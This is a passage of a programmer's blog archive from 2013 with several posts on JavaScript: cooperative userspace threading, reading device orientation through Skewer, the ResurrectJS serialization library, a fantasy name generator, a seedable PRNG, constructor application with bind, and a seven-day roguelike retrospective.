This is probably not too exciting because you should be within a couple of seconds of the server. If you’re feeling ambitious, change your local system time by a few minutes and refresh the page. The server time should still be accurate while your local time is whatever incorrect time you set.

Here’s the code for these clocks:

var Demo = Demo || {};

Demo.setDate = function(id, date) {
    document.getElementById(id).innerHTML = date;
};

Demo.offset = Demo.getServerDate() - Date.now();

setInterval(function() {
    var date = new Date();
    Demo.setDate('time-local', date);
    Demo.setDate('time-server', new Date(Demo.offset + date.valueOf()));
}, 1000 / 15);

You know what? I think this is better than some random datetime web service anyway.

Userspace Threading in JavaScript

2013-04-28T00:00:00Z

There was an interesting Daily Programmer problem posted a couple of weeks ago: write a userspace threading library. I decided to do it in JavaScript, building it on top of setTimeout. Remember that JavaScript is single-threaded by specification, so this will be a nonpreemptive, cooperative system.

Start by creating the Thread prototype. As thread constructors usually work, it accepts the function to be run in that thread.

function Thread(f) {
    this.alive = true;
    this.schedule(f);
}

The schedule method schedules a function to be run in that thread. It’s not really meant for users to use directly. I’ll define it in a moment.

Only one thread actually runs at a time, so globally keep track of the which one is running at the moment.

Thread.current = null;

Now here’s the core method that makes everything work, runner. It accepts a function of arbitrary arity and returns a function that runs the provided function in this thread.

Thread.prototype.runner = function(f) {
    var _this = this;
    return function() {
        if (_this.alive) {
            try {
                Thread.current = _this;
                f.apply(this, arguments);
            } finally {
                Thread.current = null;
            }
        }
    };
};

The runner sets the current thread to the proper value, calls the function, then clears the current thread. If the thread is no longer active, nothing happens.

With that in place, schedule is defined like this,

Thread.prototype.schedule = function(f) {
    setTimeout(this.runner(f), 0);
};

It creates a runner function for f and schedules it to run as soon as possible on JavaScript’s event loop using setTimeout. Queuing up on the event loop is the cooperative part of all this. Other threads and events may already be queued with a timeout of 0, so they run first.

Technically this is all that’s needed. To yield, schedule a function and return.

function() {
    // ... do some work ...
    Thread.current.schedule(function() {
        // ... do more work ...
    });
}

I don’t want the user to need to think about Thread.current, so here’s a convenience yield function.

Thread.yield = function(f) {
    Thread.current.schedule(f);
};

Now to use it,

function() {
    // ... do some work ...
    Thread.yield(function() {
        // ... do more work ...
    });
}

Halting a thread is easy. Any scheduled functions for this thread will not be invoked, as specified in the runner method.

Thread.prototype.destroy = function() {
    this.alive = false;
};

There’s one more situation to worry about: callbacks. Imagine an asynchronous storage API.

// ... in thread context ...
storage.getValue(function(value) {
    // doesn't run in thread context
});

In order to run in the thread the library user would need to create a runner function for the current thread. To avoid making them worry about Thread.current and runner, provide another convenience function, wrap. There may be a better name for it, but I couldn’t think of it.

Thread.wrap = function(f) {
    return Thread.current.runner(f);
};

Fixing the callback,

// ... in thread context ...
storage.getValue(Thread.wrap(function(value) {
    // ... also in thread context ...
}));

Threading Demo

To demonstrate threading I’ll make a thread that continuously fetches random numbers from a server and displays them.

Here’s a simple-httpd servlet for generating numbers. The route for this servlet will be /random.

(defservlet random text/plain ()
  (princ (random* 1.0)))

Since I’m doing this interactively with Skewer on the blank demo page, make a tag for displaying the number.

var h1 = document.createElement('h1');
document.body.appendChild(h1);

Here’s the function that will run in the thread. It fetches a number asynchronously, displays it, then recurses. Notice that Thread.yield() acts like a trampoline, providing free tail-call optimization! This is because the stack is cleared before the provided function is invoked.

function random() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', '/random', true);
    xhr.send();
    xhr.onload = Thread.wrap(function() {
        h1.innerHTML = xhr.responseText;
        Thread.yield(random);
    });
};

I set onload after calling send just for code organization purposes. That code is evaluated after send is called. As far as I know this should work fine.

Now to create a thread!

var foo = new Thread(random);

The heading flashes with random numbers as soon as the thread is created. Even though this thread is continuously running, it’s frequently yielding. Everything remains responsive, including the ability to stop the thread.

foo.destroy();

As soon as this is evaluated, the heading stops being updated. I think that’s pretty neat!

Performance

I haven’t tested performance, but I imagine it’s awful. Especially because of that frequent use of the apply method. You wouldn’t want CPU-intensive operations to cooperate like this. Fortunately, in my demo above I’m manipulating the DOM and waiting on a server response, so the performance penalties of threading should be negligible.

Tracking Mobile Device Orientation with Emacs

2013-04-27T00:00:00Z

Nine years ago I bought my first laptop computer. For the first time I could carry my computer around and do productive things at places beyond my desk. In the meantime a new paradigm of mobile computing has arrived. Following a similar pattern, this month I bought a Samsung Galaxy Note 10.1, an Android tablet computer. Having never owned a smartphone, this is my first taste of modern mobile computing.

Once the technology caught up, laptops were capable enough to fully replace desktops. However, this tablet is no replacement for my laptop. Mobile devices are purely for consumption, so I will continue to use desktops and laptops for the majority of my computing. I’m writing this post on my laptop, not my tablet, for example.

Owning a tablet has opened up a whole new platform for me to explore as a programmer. I’m not particularly interested in writing Android apps, though. I’m obviously not alone in this, as I’ve found that nearly all Android software available right now is somewhere between poor and mediocre in quality. The hardware was worth the cost of the device, but the software still has a long way to go. I’m optimistic about this so I have no regrets.

A New Web Platform

Instead, I’m interested in mobile devices as a web platform. One of the few high-quality pieces of software on Android are the web browsers (Chrome and Firefox), and I’m already familiar with developing for these. Even more, I can develop software live on the tablet remotely from my laptop using Skewer — i.e. the exact same development tools and workflow I’m already using.

What’s new and challenging is the user interface. Instead of traditional clicking and typing, mobile users tap, hold, swipe, and even tilt the screen. Most challenging of all is probably accommodating both kinds of interfaces at once.

One of the first things I wanted to play with after buying the tablet was the gyro. The tablet knows its acceleration and orientation at all times. This information can be accessed in JavaScript using a fairly new API. The two events of interest are ondevicemotion and ondeviceorientation. Using simple-httpd I can transmit all this information to Emacs as it arrives.

Instead of writing a new servlet for this, to try it out I used skewer.log(). Connect a web page viewed on the tablet to Skewer hosted on the laptop, then evaluate this in a js2-mode buffer on the laptop.

window.addEventListener('devicemotion', function(event) {
    var a = event.accelerationIncludingGravity;
    skewer.log([a.x, a.y, a.z]);
});

Or for orientation,

window.addEventListener('deviceorientation', function(event) {
    skewer.log([event.alpha, event.beta, event.gamma]);
});

These orientation values appeared in my *skewer-repl* buffer as I casually rolled the tablet on one axis. The units are obviously degrees.

[157.4155398727678, 0.38583511837777246, -44.61023992234689]
[155.4477623728871, -0.6438986350040569, -44.69645057005079]
[154.32208572596647, -0.7516393196323073, -45.79730289443301]
[155.437674183483, -0.48375529832044045, -46.406449900466015]
[156.2974174150692, 0.21938214098430556, -47.482812581579154]
[154.85869270791937, 0.11046702400456986, -48.67378583696511]
[153.3284161451347, -0.9344782009891125, -48.61755630462298]
[154.11860073021347, -0.6553947505116874, -49.949668589018074]
[155.85919247792117, 0.05473832995756562, -49.84400214746339]
[156.92487274317241, 0.4946305069438346, -49.86369016774595]
[158.06542554210534, 0.712759801803332, -49.61875275392013]
[159.356905031128, 1.3387109941852697, -49.9372717956745]

It would be neat to pump these into a 3D plot display as they come in, such that my laptop displays the current tablet orientation on the screen as I move it around, but I didn’t see any quick way to do this.

Here are some acceleration values at rest. Since I took these samples on Earth the units are obviously in meters per second per second.

[-0.009576806798577309, 0.31603461503982544, 9.816226959228516]
[-0.047884032130241394, 0.3064578175544739, 9.806650161743164]
[-0.009576806798577309, 0.28730419278144836, 9.787496566772461]
[0.009576806798577309, 0.3064578175544739, 9.816226959228516]
[-0.06703764945268631, 0.3256114423274994, 9.797073364257812]
[-0.047884032130241394, 0.2968810200691223, 9.864110946655273]
[-0.028730420395731926, 0.2968810200691223, 9.576807022094727]
[-0.019153613597154617, 0.363918662071228, 9.691728591918945]
[-0.05746084079146385, 0.3734954595565796, 10.199298858642578]

Now that I have the hardware for it, I really want to use this API to do something interesting in a web application. I just don’t have any specific ideas yet.

Precise JavaScript Serialization with ResurrectJS

2013-03-28T00:00:00Z

One of the problems I needed to solve while writing my 7DRL was serializing the game’s entire state for a future restore. It needed to automatically save the game so that the player could close their browser/tab and continue the game later from where they left off. I attempted to use HydrateJS, but finding it inadequate for the task I rolled my own solution from scratch.

After the week ended, I ripped my solution out of the game, filled in the rest of the missing features, and created a precise serialization library called ResurrectJS. It can do everything HydrateJS is meant to do and more: Dates, RegExps, and DOM objects.

https://github.com/skeeto/resurrect-js

It works with all the major browsers, including You Know Who.

To demonstrate, here’s another Greeter prototype.

function Greeter(name) {
    this.name = name;
}
Greeter.prototype.greet = function() {
    return "Hello, my name is " + this.name;
};

var kelsey = new Greeter('Kelsey');
kelsey.greet();
// => "Hello, my name is Kelsey"

ResurrectJS can serialize kelsey for storage, including behavior. I’m creating new Resurrect objects each time just to show that this definitely works across different instances. Nothing up my sleeves! There’s no reason to avoid reusing Resurrect objects because the only state they maintain between method calls is their configuration.

var string = null;
string = new Resurrect().stringify(kelsey);
// => '[{"#":"Greeter","name":"Kelsey"}]'

kelsey;
// => {"name":"Kelsey","#id":null}

Notice that the serialization format is a bit unusual: it’s wrapped in an array. It’s still a valid JSON encoding. Also notice that kelsey gained a new property, #id, assigned to null, but this property was not encoded. I’ll explain all this below.

Here’s object resurrection.

var zombie = null;
zombie = new Resurrect().resurrect(string);
// => {"#":"Greeter","name":"Kelsey"}

zombie.greet();
// => "Hello, my name is Kelsey"

zombie === kelsey;  // A whole new object
// => false

The resurrected object has a # property. As explained before this is used to link the object back into the prototype chain so that its behavior is restored.

What’s special now, which I didn’t need in my game, is that identity, including circularity, is properly maintained! For example,

var necromancer = new Resurrect();
necromancer.stringify([kelsey, kelsey]);
// => '[[{"#":1},{"#":1}],{"#":"Greeter","name":"Kelsey"}]'

var array = necromancer.resurrect(string);
array[0] === array[1];
// => true

The encoding should begin to reveal itself now. There’s only one Greeter object serialized and two {'#': 1} objects — references into the top-level array.

Identity and Equality Review

Just to make sure everyone’s on the same page I’m going to go over the difference between identity and equality. Identity is referential: testing for it is effectively comparing memory pointers. Equality is structural: testing for it walks the structures recursively.

In JavaScript the === operator tests equality for primitive values (numbers, strings) and identity for objects.

2 === 2;
// true, these values are equal

({foo: 2} === {foo: 2});
// false, these are equal but different object instances

JavaScript has no operator for testing object equality and writing a function to do the job is surprisingly complicated. Underscore.js has such a function and it’s about 100 lines of code.

JSON maintains object equality but not object identity. Due to the former it can be used to fake an equality test.

Object.prototype.equals = function(that) {
    return JSON.stringify(this) === JSON.stringify(that);
};

({foo: 2}).equals({foo: 2});
// => true

However, keys are encoded in insertion order, so this is really fragile. Bencode would be better suited (sorted keys), except that it supports few of JavaScript’s types.

({a: 1, b: 2}).equals({b: 2, a: 1});
// => false (incorrect), due to ordering

ResurrectJS extends JSON to maintain identity as well as equality across serialization. It does so through the use of references, as explained below.

In functional languages, such as Haskell or most of Clojure, there is little to no practical distinction between these two concepts. When objects are immutable it makes no difference to a program if they are identical. Everything is a value.

Serialization Algorithm

The clever algorithm used by ResurrectJS was thought up by Brian while I discussing the problem with him. Unlike HydrateJS, the serialized form doesn’t follow the original structure’s form. While walking the data structure, copies of objects are placed into an array as they’re visited. When an object is first seen, it is tagged with an #id property corresponding to the copy’s position in the array. If we come across an object with a non-null #id we know we’ve seen it before and skip over it.

Most importantly, these copies don’t actually have any direct references to other objects. Instead these properties are replaced with references to objects in other positions in the array. Primitive, non-object values aren’t referenced like this. They’re left in place and encoded as part of the object copy.

I’m using the word “object” broadly here to include Arrays. Objects and Arrays are composite and everything else are atoms/values. Composites are things that are made up of atoms, so they need to be taken apart before serialization.

When walking the data structure is complete, the program walks the copy array and sets the #id properties of the original objects to null. This prevents them from being mistaken as already-visited by future ResurrectJS walks (and this was one of HydrateJS’s flaws). If the cleanup config option is set to true, these #id properties are completely removed with delete, which has performance implications for those objects.

Finally, the copy array is serialized by JSON.stringify(). That’s it! Because objects are identified by their position in the copy array they don’t need identifiers attached to them when encoded.

In the array example above {'#': 1} is a reference to the second object in the copy array. The first object in the copy array is the original array being serialized. For example, here’s a circular reference,

var circle = [];
circle.push(circle);
necromancer.stringify(circle);
// => '[[{"#":0}]]'

The first object in the copy array is an array that contains a reference to itself.

JSON doesn’t support undefined but I get it for free with this scheme: any time I come across undefined I replace it with a reference to the object at index -1. This will always be undefined!

string = necromancer.stringify([undefined]);
// => '[[{"#":-1}]]'

Deserialization

To deserialize, the string is parsed as regular JSON resulting in the final copy array, which is walked. Prototypes are properly linked and references are replaced with the appropriate object from the array. The first object in the array is the root of the data structure (the very first object seen during serialization), so it is returned as the result. Simple!

Special Values

ResurrectJS handles Dates automatically, treating them as atomic values.

var object = {date: new Date(Math.pow(10, 12))};
string = necromancer.stringify(object);
// => '[{"date":{"#.":"Date","#v":["2001-09-09T01:46:40.000Z"]}}]'

necromancer.resurrect(string).date.toString();
// => "Sat Sep 08 2001 21:46:40 GMT-0400 (EDT)"

When the program comes across one of these special values, a “constructor” object is placed in the copy. On deserialization, not only are references restored, but special values are also reconstructed. The #. field indicates the constructor and the #v field provides the constructor’s arguments as an array. Applying a constructor was a non-trivial issue.

A consequence of treating Dates as values is that ResurrectJS doesn’t maintain their identity. Having the same Date in two places on a data structure will result in two different date objects after deserialization.

var date = new Date();
string = necromancer.stringify([date, date]);
array = necromancer.resurrect(string);
array[0] === array[1];
// => false

If the user was intending on mutating the Date and having it update Dates (the same one) elsewhere in the structure, this will break it. In my opinion, people mutating Dates deserve whatever is coming to them.

Here’s a RegExp being serialized,

string = necromancer.stringify(/abc/i);
// => '{"#.":"RegExp","#v":["abc","i"]}'

necromancer.resurrect(string).test('abC');
// => true

If you were watching carefully you might notice there’s no wrapper array. If an atomic value is stringified directly then the copy array process is not performed.

Here’s one of the most interesting values to serialize: a DOM element.

var h1 = document.createElement('h1');
h1.innerHTML = 'Hello';
necromancer.stringify(h1);
// => '{"#.":"Resurrect.Node","#v":["Hello"]}'

document.body.appendChild(necromancer.resurrect(string));
// (the heading appears on the page)

It uses XMLSerializer to serialize the DOM element into XML. The counterpart to XMLSerializer is DOMParser, but, unfortunately, DOMParser is near useless. Instead I create a wrapper div, shove the string in as innerHTML, and pull the DOM element out. It works beautifully.

Configuration

The Resurrect constructor accepts a configuration object. Check the documentation for all of the details. It lets you control the prefix used for the intrusive property names, in case you need # for yourself. You can control prototype relinking and post-serialization cleanup, as mentioned before.

necromancer = new Resurrect({
    prefix: '__',
    cleanup: true,
    revive: false
});

I’m really quite proud of how this library turned out. As far as I know it’s the only library that can actually do all this. It’s tempting to pull it into Skewer so that it can transmit data structures between Emacs Lisp and JavaScript as perfectly as possible, but I’m afraid that the properties I’m adding during serialization are too intrusive.

JavaScript Fantasy Name Generator

2013-03-27T00:00:00Z

Also in preparation for my 7-day roguelike I rewrote the RingWorks fantasy name generator in JavaScript. It’s my third implementation of this generator and this one is also the most mature by far.

Try it out by playing with the demo (GitHub).

The first implementation was written in Perl. It worked by interpreting the template string each time a name was to be generated. This was incredibly slow, partly because of the needless re-parsing, but mostly because the parser library I used had really poor performance. It’s literally millions of times slower than this new JavaScript implementation.

The second implementation I did in Emacs Lisp. I didn’t actually write a parser. Instead, an s-expression is walked and interpreted for each name generation. Much faster, but I missed having the template syntax.

The JavaScript implementation has a template compiler. There are five primitive name generator prototypes — including strings themselves, because anything with a toString() method can be a name generator — which the compiler composes into a composite generator following the template. The neatest part is that it’s an optimizing compiler, using the smallest composition of generators possible. If a template can only emit one possible pattern, the compiler will try to return a string of exactly the one possible output.

typeof NameGen.compile('(foo) (bar)');
// => "string"

Here’s the example usage I have in the documentation. On my junk laptop it can generate a million names for this template in just under a second.

var generator = NameGen.compile("sV'i");
generator.toString();  // => "entheu'loaf"
generator.toString();  // => "honi'munch"

However, in this case there aren’t actually that many possible outputs. How do I know? You can ask the generator about what it can generate. Generators know quite a bit about themselves!

generator.combinations();
// => 118910

var foobar = NameGen.compile('(foo|bar)');
foobar.combinations();
// => 2
foobar.enumerate(); // List all possible outputs.
// => ["foo", "bar"]

After some experience using it in Disc RL I found that it would be really useful to be mark parts of the output to the capitalized. Without this, capitalization is awkwardly separate metadata. So I extended the original syntax to do this. Prefix anything with an exclamation point and it gets capitalized in the output.

For example, here’s a template I find amusing. There are 5,113,130 possible output names.

!BsV (the) !i

Here are some of the interesting output names.

Quisey the Dork
Cunda the Snark
Strisia the Numb
Pustie the Dolt
Blhatau the Clown

Mostly as an exercise, I also added tilde syntax, which reverses the component that follows it. So ~(foobar) will always emit raboof. I don’t think this is particularly useful but having it opens the door for other similar syntax extensions.

If you’re making a procedurally generated game in JavaScript, consider using this library for name generation!

A Seedable JavaScript PRNG

2013-03-25T00:00:00Z

In preparation for my 7-day roguelike, I developed a seedable pseudo-random number generator library. Half of it is basically a port of BrianScheme’s PRNG.

JavaScript comes with an automatically-seeded global uniform PRNG, Math.random(). This is suitable for most purposes, but if repeatability and isolation is desired — such as when generating a roguelike dungeon — it’s inadequate. I also wanted to be able to sample from different probability distributions, particularly the normal distribution and the exponential distribution.

The underlying number generator is the elegant RC4. Seeds are strings and anything else (except functions) is run through JSON.stringify(). Characters above code 255 are treated as two-byte values. If no seed is provided it will grab some of the available entropy for the job. To generate a uniform random double-precision value, 7 bytes (56 bits) are generated to account for the full 53-bit mantissa.

All other distributions sample from the uniform number generator, so bits are twiddled in only one place. Moreso, it means that Math.random() can be used as the core random number generator. My RC4 implementation is about 10x slower than V8’s Math.random(), so if all you care about is the probability distributions, not the seeding, then you could benefit from better performance. Just provide Math.random as the “seed”.

Here’s an example of it in action. I’m seeding it with an arbitrary object and generating six normally-distributed values. The output should be exactly the same no matter what JavaScript engine is used.

(function(array, n) {
    var rng = new RNG({foo: 'bar'});
    for (var i = 0; i < n; i++) {
        array.push(parseFloat(rng.normal().toFixed(4)));
    }
    return array;
}([], 6));
// => [0.807, -0.9347, -1.4543, -0.2737, 0.5064, -1.7342]

Provided probability distributions:

As far as the extras go, in my game I only ended up using the exponential distribution, for generating monster-spawning events. I intended to use the normal distribution for map generation, but, to save time, I used rot.js for that purpose.

As far as testing goes, I basically just exported the output to GNU Octave so that I could eyeball the histogram and do some basic statistical checks. Everything looks reasonable, so I assume it’s implemented correctly. “That’s the problem with randomness. You can never be sure.”

Using the same seed as above, here are some histograms of the first 10,000 samples for different probability distributions.

Uniform:

Normal:

Exponential:

Gamma (mean = 4):

Applying Constructors in JavaScript

2013-03-24T00:00:00Z

I’ve split off my JavaScript serialization library, where deserialized objects maintain their prototype chain. One of the problems I ran into was applying a provided constructor function to an arbitrary number of arguments. Due to abstraction leaks in the language’s design, this turns out to be disappointingly more complicated than I thought. Fortunately there’s a portable workaround hack that works.

The goal of this article is to define a create function to replace the new operator. This function will take a constructor function and an arbitrary number of arguments for the constructor. Below, these pairs should have identical effects.

new Greeter('Kelsey');
create(Greeter, 'Kelsey');

new RegExp('abc', 'i');
create(RegExp, 'abc', 'i');

new Date(0);
create(Date, 0);

Function Application Review

Functions are full-fledged objects with their own methods, the three most important of which being call, apply, and bind. The first two invoke the function and the last one creates a new function.

call is used when a particular context (this) needs to be explicitly set. The argument provided as the first argument will be the context and the remaining arguments will be the normal function arguments.

function foo(a, b, c) {
    return [this, a, b, c];
}

foo.call(0, 1, "bar", 3);
// => [0, 1, "bar", 3]

foo.call(null, 1, "bar", 3);
// => [[object Window], 1, "bar", 3]
// => [null, 1, "bar", 3] (strict mode)

Normally, null and undefined cannot be passed as this: they will automatically be replaced with the global object. In strict mode, these values are passed directly as this. Also, primitive types will be boxed — wrapped in an object.

apply is exactly like call, but the arguments are provided as an array. This is necessary for truly dynamic function calls since the arguments aren’t fixed.

foo.apply(0, [1, "bar", 3]);
// => [0, 1, "bar", 3]

Finally, bind is also like call except that it performs partial application. It returns a function with the context and initial arguments locked in place.

var bar = foo.bind(0, 1, "bar");
bar(3);
// => [0, 1, "bar", 3]

Notice how a call to bind looks like a call to call. The arguments are provided individually. What if I wanted a bind that was shaped like apply? That is, what if the arguments I want to lock in place are listed in an array? Here’s is the really cool part: bind itself is a function, so it can be applied to the array of arguments.

var baz = foo.bind.apply(foo, [0, 1, "bar"]);
baz(3);
// => [0, 1, "bar", 3]

This can be a little confusing because there are two contexts being bound. The first context is the context for bind, which is the function (foo) being partially applied. The second context is this (0) being locked into place.

Manual Object Construction

Generally to create a new object in JavaScript, the new operator is applied to a constructor function. How it works is generally very simple:

Create a new object with the constructor’s prototype (__proto__) as its prototype.
Apply the constructor function to this object.

The first step can be accomplished with the relatively recent Object.create() function. The second is just a normal function call.

function Greeter(name) {
    this.name = name;
}

Greeter.prototype.greet = function() {
    return "Hello, " + this.name;
};

// Standard construction with the new operator
var greeter = new Greeter('Kelsey');

greeter.greet();  // => "Hello, Kelsey"

// Manual construction with Object.create()
var manual = Object.create(Greeter.prototype);
Greeter.call(manual, 'Kelsey');

manual.greet();  // => "Hello, Kelsey"

Above, call had to be used in order to set the context of the call. Similarly, if there’s an array of arguments, apply could be used instead.

Greeter.apply(manual, ['Kelsey']);
manual.greet();  // => "Hello, Kelsey"

Getting it Right

The above doesn’t entirely capture everything about the new operator. Constructors are allowed to return an object (i.e. not a primitive value) other than this, and that will be the newly constructed object — even if it’s an entirely different type!

function Foo() {
    return new Greeter('Chris');
}

new Foo().greet();  // => "Hello, Chris"

Here’s the proper way to write create, assuming the language doesn’t throw a curve-ball at us in some corner case.

function create(constructor) {
    var args = Array.prototype.slice.call(arguments, 1);
    var object = Object.create(constructor.prototype);
    var result = constructor.apply(object, args);
    if (typeof result === 'object') {
        return result;
    } else {
        return object;
    }
}

create(Greeter, 'Chris').greet();  // => "Hello, Chris"
create(Foo).greet();  // => "Hello, Chris"

The Abstraction Leak

The above works with any JavaScript objects defined by the developer, but, unfortunately, built in types have special privilege that complicates their construction. It does work with RegExp,

create(RegExp, 'abc', 'i').test('abC');  // => true

However, it does not work with Date or the other built in types,

create(Date, 0).toISOString(); // => TypeError

There are two reasons for this: the built in types don’t actually use the prototype chain. Object.create() cannot create built in types! Below I will use the toString method from the Object prototype to see what the runtime really thinks these types are.

function toString(object) {
    return Object.prototype.toString.call(object);
}

var fakeDate = Object.create(Date.prototype);
toString(fakeDate);  // => "[object Object]"
toString(new Date());  // => "[object Date]"

The object returned by Object.create() isn’t actually a Date object as far as the runtime is concerned. The same applies to Number, RegExp, String, etc. If you try to call any methods on these objects, it will throw a type error.

Worse, with the exception of RegExp, the built in type constructors don’t return objects either. The wrapper objects Boolean, Number, and String return the primitive version of their arguments. Date returns a primitive string.

typeof Date(0);  // "string"

So the only way to create a Date or these other built in types (except RegExp) is through the new operator. To loop back around to the original problem: we have an array of arguments and a constructor. We want to apply the constructor to the array to create a new object. The conflict is that new and apply can’t be used at the same time, so it would seem there’s no way to write generic create function that works with built in types without explicitly making them a special case.

The Workaround

Fortunately, kybernetikos at Stack Overflow found an ingenious solution to this. We can have our cake and eat it, too. We can mix new and apply by hacking bind. It turns out to be a lot simpler than the “proper” create definition above.

function create(constructor) {
    var factory = constructor.bind.apply(constructor, arguments);
    return new factory();
};

It works with all the built in types, covering all the examples at the top of the article.

toString(create(Date, 0));  // => "[object Date]"
toString(create(RegExp, 'abc'));  // => "[object RegExp]"
create(Greeter, 'Kelsey').greet();  // => "Hello, Kelsey"

The bizarre thing here is that new still gets to break the rules. Normally, bind locks in this permanently, so that it can’t be overridden even by call. Here’s foo again demonstrating this.

function foo(a, b, c) {
    return [this, a, b, c];
}

foo.bind(100).call(0, 1, 2, 3);  // => [100, 1, 2, 3]

The factory constructor in create already has this bound, but new gets to override it anyway. Moreso — and this is really important for my purposes — the constructor name survives this process, through both the unofficial name property and toString method! Normally functions returned by bind have no name.

Greeter.bind(null).name;  // ""
create(Greeter, '').constructor.name;  // => "Greeter"

Thanks to this hack, this final version of create is essentially what I’m using in my library to reconstruct arbitrary “value” objects. I’m lucky I came across it or I really would have been stuck.

7DRL 2013 Complete

2013-03-17T00:00:00Z

As I mentioned previously, I participated in this year’s Seven Day Roguelike. It was my first time doing so. I managed to complete my roguelike within the allotted time period, though lacking many features I had originally planned. It’s an HTML5 game run entirely within the browser. You can play the final version here,

Disc RL

What Went Right

Display

The first thing I did was create a functioning graphical display. The goal was to get it into a playable state as soon as possible so that I could try ideas out as I implemented them. This was especially true because I was doing live development, adding features to the game as it was running.

The display is made up of 225 (15x15) absolutely positioned div elements. The content of each div is determined by its dynamically-set CSS classes. Generally, the type of map tile is one class (background) and the type of monster in that tile is another class (foreground). If the game had items, these would also be displayed using classes.

While I could use background-image to fill these divs with images, I decided when I started I would use no images whatsoever. Everything in the game would be drawn using CSS.

After the display was working, I was able spend the rest of the time working entirely in game coordinates, completely forgetting all about screen coordinates. This made everything else so much simpler.

Saving

Early in the week I got my save system working. After ditching a library that wasn’t working, it only took me about 45 minutes to do this from scratch. Plugging my main data structure into it just worked. I did end up accidentally violating my assumption about non-circularity. When adding multiple dungeon levels, these levels would refer to each other, leading to circularity. I got around that with a small hack of referring to other dungeons by name, an indirect reference.

From what I’ve seen of other HTML5 roguelikes, saving state seems to be a unique feature of my roguelike. I don’t see anyone else doing it.

Combat

I think the final combat mechanics are fairly interesting. It’s all based on identity discs and corruption (see the help in the game for more information). There are two kinds of attacks that any creature in the game can do: melee (bash with your disc) and ranged (throw your disc). I created three different AIs to make use of these, bringing in four different monster classes. Note, I consider these game spoilers.

Simple: Middle-of-the-road on abilities, these guys run up and try to hit you. No ranged attacks. The strategy is to attack them with ranged as they close in, then melee them down. They’re easy and these are the monsters you see in the beginning of the game.
Brute: These guys have high health and damage (high strength), but are slow moving (low dexterity). They try to run up to you and bash you (same AI as “simple” monsters). The strategy for them is to “kite” them, keeping your distance and hitting them with ranged attacks, especially when they’re standing on corruption.
Archer: Archers are the opposite of brutes: low health, high ranged damage, and high speed. They chase you down and perform ranged attacks no matter what. The strategy for dealing with them is to break line-of-sight and wait. They’ll run up and around the corner where you can melee attack them. Since they’ll continue to use ranged attacks this leaves them wide open for melee attacks. This is due to a mechanic that monsters, including the player, can’t block attacks with their disc for one turn after they throw it.
Skirmisher: This is a hybrid of brutes and archers and are the most difficult. They have high dexterity, sometimes also high strength, and use the appropriate attack for the situation. At range they use ranged attacks, they’ll try to run away from you if you get close, and if you do manage to get up close they’ll switch to melee. Dealing with these guys depends a lot on the terrain around you. Remember to take advantage of corruption when dealing with them.

The eight final, identical bosses of the game have a slightly custom AI, making them sort of like another class on their own. They’re the “T” monsters in the screenshot above. I won’t describe it here because I still want there to be some sort of secret. :-)

Corruption

Corruption was actually something I came up with late in the week, and I’m happy with out it turned out. It makes for more interesting combat tactics (see above) and I think it really adds some flavor. Occasionally when you move over corrupted (green) tiles, you will notice the game’s interface being scrambled for a turn.

rot.js

I ended up using rot.js to handle field-of-view calculations, path finding, and dungeon generation. These are all time consuming to write and there really is no reason to implement your own for the first two. I would have liked to do my own dungeon generation, but rot.js was just so convenient for this that I decided to skip it. The downside is that my dungeons will look like the dungeons from other games.

Path finding was critical not only for monsters but also automatic exploration. Even though it’s quirky, I’m really happy with how it turned out. Personally, one of the most tiring parts of some roguelikes is just manually navigating around empty complex corridors. Good gameplay is all about a long series of interesting decisions. Choosing right or left when exploring a map is generally not an interesting decision, because there’s really no differentiating them. Auto-exploration is a useful way to quickly get the player to the next interesting decision. In my game, you generally only need to press a directional navigation key when you’re engaged in combat.

Help Screen

I’m really happy with how my overlay screens turned out, especially the keyboard styling. I’m talking about the help screen, control screen, and end-game screen. Since this is the very first thing presented to the user, I felt it was important to invest time into it. First impressions are everything.

What Went Wrong

The game is smaller than I originally planned. Monsters have unused stats and slots on them not displayed by the interface. A look at the code will reveal a lot of openings I left for functionality not actually present. I originally intended for 10 dungeon levels, but lacking a variety of monster AIs, which are time consuming to write, I ended up with 6 dungeon levels.

User Interfaces

My original healing mechanic was going to be health potions (under a different, thematic name), with no heal-over-time. As I was nearing the end of the week I still hadn’t implemented items, so this got scrapped for a heal-on-level mechanic and an easing of the leveling curve. Everything was in place for implementing items, and therefore healing potions, except for the user interface. This was a common situation: the UI being the hardest part of any new feature. Writing an inventory management interface was going to take too much time, so I dropped it.

Also dumped due to the lack of time to implement an interface for it was some kind of spell mechanic. Towards the end I did squeeze in ranged attacks, but this was out of necessity of real combat mechanics.

There’s no race (Program, User, etc) and class (melee, ranged, etc.) selection, not even character name selection. This is really just another user interface thing.

There are no stores/merchants because these are probably the hardest to implement interfaces of all!

Game Balance

I’m also not entirely satisfied with the balance. The early game is too easy and the late game is probably too hard. The difficulty ramps up quickly in the middle. Fortunately this is probably better than the reverse: the early game is too hard and the end game is too easy. Early difficulty won’t be what’s scaring off anyone trying out the game — instead, that would be boredom! Generally if you find a level too difficult, you need to retreat to the previous level and grind out a few more levels. This turns out to be not very interesting, so there needs to be less of it.

Fixing this would take a lot more play-testing — also very time-consuming. At the end of the week I probably spent around six hours just playing legitimately (i.e. not cheating), and having fun doing so, but that still wasn’t enough. The very end of the game with the final bosses is quite challenging, so to test that part in a reasonable time-frame I had to cheat a bit.

Code Namespacing

My namespaces are messy. This was the largest freestanding (i.e. not AngularJS) JavaScript application I’ve done so far, and it’s the first one where I could really start to appreciate tighter namespace management. This lead to more coupling between different systems than was strictly necessary.

I still want to avoid the classical module pattern of wrapping everything in a big closure. That’s incompatible with Skewer for one, and it would have also been incompatible with my prototype-preserving storage system. I just need to be more disciplined in containing sprawl.

However, in the end none of this really mattered one bit. No one is maintaining this code and no one will ever read it except me. At the end of the week it’s much better to have sloppy code and a working game than a clean codebase and only half of a game.

CSS Animations

Along with my no-images philosophy, I was intending to exploit CSS animations to make the map look really interesting. I wanted the glowing walls to pulsate with energy. Unfortunately adding a removing classes causes these animations to reset if reflow is allowed to occur — sometimes. The exact behavior is browser-dependent. All the individual tile animations would get out of sync and everything would look terrible. There is intentionally little control over this behavior, for optimization purposes, so I couldn’t fix it.

Next Year?

Will I participate again next year? Maybe. I’m really happy with the outcome this year, but I’m afraid doing the same thing again next year will feel tedious. But maybe I’ll change my mind after taking a year off from this! I wasn’t intending on participating this year, until Brian twisted my arm into it. See, peer pressure isn’t always a bad thing!

Serializing JavaScript Objects

2013-03-11T00:00:00Z

